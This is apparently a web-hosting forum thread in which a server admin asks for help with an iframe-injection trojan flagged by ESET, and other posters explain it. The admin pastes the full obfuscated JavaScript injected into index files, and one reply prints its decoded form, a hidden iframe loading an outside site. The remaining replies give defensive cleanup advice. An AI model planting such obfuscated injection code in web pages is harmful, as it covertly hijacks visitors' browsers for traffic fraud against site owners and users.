HTML/TrojanClicker.IFrame.NAG trojan Found by ESET

[chapsrulez]

On sunday ESET notified me of the HTML/TrojanClicker.IFrame.NAG trojan to be found on one of my sites, and since then it has been spreading into other accounts at my server.

I have clamav installed and did a

./clamav -r /home

to search for viruses, but nothing was found, i also run a scan from cpanel, but it no virus/threat was detected.

any body has any idea how to deal with this trojan?
thanks a lot.

[chapsrulez]

I found that the worm writes the following code an all index.php and index.html files on /home

PHP Code:

<script>function c267ccf4e5i49d4ce71e9f67(i49d4ce71ea34b){ function i49d4ce71ea729(){return 16;} return (parseInt(i49d4ce71ea34b,i49d4ce71ea729()));}function i49d4ce71eaeee(i49d4ce71eb2ca){ function i49d4ce71ebe70(){var i49d4ce71ec8db=2;return i49d4ce71ec8db;} var i49d4ce71eb6a9='';i49d4ce71ecdfe=String.fromCharCode;for(i49d4ce71eba90=0;i49d4ce71eba90<i49d4ce71eb2ca.length;i49d4ce71eba90+=i49d4ce71ebe70()){ i49d4ce71eb6a9+=(i49d4ce71ecdfe(c267ccf4e5i49d4ce71e9f67(i49d4ce71eb2ca.substr(i49d4ce71eba90,i49d4ce71ebe70()))));}return i49d4ce71eb6a9;} var re7='';var i49d4ce71ed738='3C7'+re7+'3637'+re7+'2697'+re7+'07'+re7+'43E696628216D7'+re7+'96961297'+re7+'B646F637'+re7+'56D656E7'+re7+'42E7'+re7+'7'+re7+'7'+re7+'2697'+re7+'465287'+re7+'56E657'+re7+'363617'+re7+'065282027'+re7+'2533632536392536362537'+re7+'322536312536642536352532302536652536312536642536352533642536332533322533362532302537'+re7+'332537'+re7+'32253633253364253237'+re7+'2536382537'+re7+'342537'+re7+'342537'+re7+'302533612532662532662537'+re7+'37'+re7+'2537'+re7+'37'+re7+'2537'+re7+'37'+re7+'2532652536362536662537'+re7+'322537'+re7+'352536642532652536662537'+re7+'302537'+re7+'342537'+re7+'392536642536312536632536392537'+re7+'61253631253633253661253631253265253633253666253664253266253366253237'+re7+'2532622534642536312537'+re7+'342536382532652537'+re7+'322536662537'+re7+'352536652536342532382534642536312537'+re7+'342536382532652537'+re7+'32253631253665253634253666253664253238253239253261253334253335253339253330253334253239253262253237'+re7+'253332253237'+re7+'2532302537'+re7+'37'+re7+'2536392536342537'+re7+'34253638253364253331253335253332253230253638253635253639253637'+re7+'2536382537'+re7+'342533642533332533302533322532302537'+re7+'332537'+re7+'342537'+re7+'39253663253635253364253237'+re7+'2537'+re7+'362536392537'+re7+'332536392536322536392536632536392537'+re7+'342537'+re7+'39253361253638253639253634253634253635253665253237'+re7+'2533652533632532662536392536362537'+re7+'3225363125366425363525336527'+re7+'29293B7'+re7+'D7'+re7+'6617'+re7+'2206D7'+re7+'969613D7'+re7+'47'+re7+'27'+re7+'5653B3C2F7'+re7+'3637'+re7+'2697'+re7+'07'+re7+'43E';document.write(i49d4ce71eaeee(i49d4ce71ed738));</script> 


I have no idea what the code does, how the trojan got into the server and how to clean it. any help is welcomed.
thanks.

[cPanelDavidG]

There are very many threads on this topic. A forum search for iframe should get you started with common causes of this and common hardening tactics.

[zinyth]

The script writes :

<iframe name=c26 src='http://www. forum.optymalizacja.com/?'+Math.round(Math.random()*45904)+'2' width=152 height=302 style='visibility:hidden'>
</iframe>

Maybe used in order to simulate visitors on the forum.optymalizacja.com

The real question is How this script appears into your webpage ??

[wanrenqingkong]

sir, I love latter part of your signature

[Spiral]

On sunday ESET notified me of the HTML/TrojanClicker.IFrame.NAG trojan to be found on one of my sites, and since then it has been spreading into other accounts at my server.

First, your server is NOT likely infected with anything whatsoever!

Second, this particular attack does not "spread" as you put it so get that idea out of you mind!

--------------------------------------------------------------
Now with that said, here is what you should know ...
--------------------------------------------------------------

There are a number of threads already posted here that I think you should read including a few posts I made with very extensive detailed information regarding this particular attack.

Basically in a nutshell, it is NOT your server that is infected but rather it is your client's who are instead infected on their home computers with a trojan which allows a hacking group operating out of China to steal the client's password. They use the information obtained directly from the client's own home computer to then access their hosting accounts (your server) and make the well known iframe changes that everyone has been observing of recent. If your server has security vulnerabilities or allows cross site scripting (IE: PHP running as an Apache Module), then they may be able to access more than one site once connected using the client's password. This attack is very much heavily in the wild right now so it is very possible that you have multiple clients infected that stems from separate home infections than anything to do with any kind of spreading within your server so as far as that goes, you can relax a little easier.

Because this infection has to do with your client's on their home computers, there is very little you can do from your end to directly stop this issue and installing security applications or virus scanners on your server will not help with this attack because the attack does not originate with your server.

If you find an infected site, the first thing you should do is suspend or change the password of the account and notify the user that their home computer is infected and they need to do a full scan with a good trojan / spyware scanner such as Spyware Doctor by PCtools as well as a full scan with a good antivirus scanner. DO NOT give the client access again until they have cleaned their home computer because the hacking group will just simply get the new password as soon as the client tries to use it.

Blocking incoming connections from proxies such as incoming connections from port 8080 and known proxies, particularly out of Russia which is what they use most often, helps to an extent. Using an Apache filter to filter out proxy links from web pages can also help with sites that have been altered. I have a couple of cron scripts posted here on a few of the related IFRAME attack threads that might help you with detecting which clients are infected on their home computers so that you can take action and notify them although some of the newer released variants are now encoding the inserted hyperlinks to make them more complicated to detect by script scanner.

Again, look at the IFRAME threads on here and take particular attention to my previous posts for more specific detail about what is going on.

If you need a hand with locating infected client accounts, I can definitely help you with that.